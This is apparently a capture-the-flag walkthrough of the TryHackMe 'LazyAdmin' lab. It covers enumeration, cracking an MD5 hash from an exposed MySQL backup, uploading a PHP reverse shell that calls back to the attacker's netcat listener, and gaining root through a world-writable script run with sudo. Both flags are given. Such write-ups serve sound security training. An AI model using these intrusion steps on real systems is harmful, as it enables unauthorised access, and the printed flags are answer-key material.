LazyAdmin
Another fun CTF from tryhackme.com
We don’t know anything about this box – just that we need to find the user and the root flag. Let’s strart with a classic portscan.
sudo nmap -sV 10.10.215.210
That’s not much. The website looks like a default apache/ubuntu page – the source code doesn’t reveal anything as well.
Just to not miss anything lets try gobuster
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.215.210
Ok. we have a folder called content. lets put that in the browser.
A content management system that is not properly installed. That looks promising.
Let’s run ghostbuster on the /content directory.
dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.215.210 130 ⨯
http://10.10.215.210/content
As it turns out /as is a login page. Lets look at /inc
The mysql-backup is of course what we will look at first.
As it turns out there is in deed a mysql backup in that directory:
mysql_bakup_20191129023059-1.5.1.sql
Let’s download it.
wget http://10.10.153.251/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
Let’s just grep the file for “passwd” and see.
grep -i passwd mysql_bakup_20191129023059-1.5.1.sql
We can see a username and a hashed password:
42f749ade7f9e195bf475f37a44cafcb
hash-identifier should tell us the type of hash we are looking at.
hash-identifier 42f749ade7f9e195bf475f37a44cafcb
It’s MD5.
So we try john with our favorite password list and see if we can crack it.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 --fork=100 passwd.txt
We know know now from the mysql backup file that the username is manager and from john that the password is Password123.
After logging in we see this:
We rember from looking at /inc in the browser that there was a ads directory there.
http://10.10.153.251/content/inc/ads/
And we have an ads menu here
We can put in code here. So MAYBE if we put php code here it gets saved in the ads directory and we could then call the code through the web browser.
So let’s try a reverse shell from
/usr/share/webshells/php/php-reverse-shell.php
and copy/paste it into the code section. We change the ip address to the one of our local machine and leave the port at 1234
Let’s check in the browser.
That looks good. Let’s start a netcat listener on our local machine.
nc -p 1234
And then click on our file in the ads directory.
We have our shell. Lets look for user.txt
find / -name user.txt 2>/dev/null
we find it at
/home/itguy/user.txt
We just try
cat /home/itguy/user.txt
and are lucky. We can read it and our user flag is
THM{63e5bce9271952aad1113b6f1ac28a07}
After this we do a
sudo -l
To see if that reeveals any options to get root and we find this:
The Backup script looks promising
/home/itguy/backup.pl
We cant change that file
-rw-r--r-x 1 root root 47 Nov 29 2019 /home/itguy/backup.pl
So let’s look at the code:
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
So how does the copy.sh look?
ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
Interesting – we can change that file.
We do a simple
echo "/bin/sh" > /etc/copy.sh
And then execute the perl script as root
sudo /usr/bin/perl /home/itguy/backup.pl
That worked well – so we collect the root flag.
cat /root/root.txt
THM{6637f41d0177b6f37cb20d775124699f}
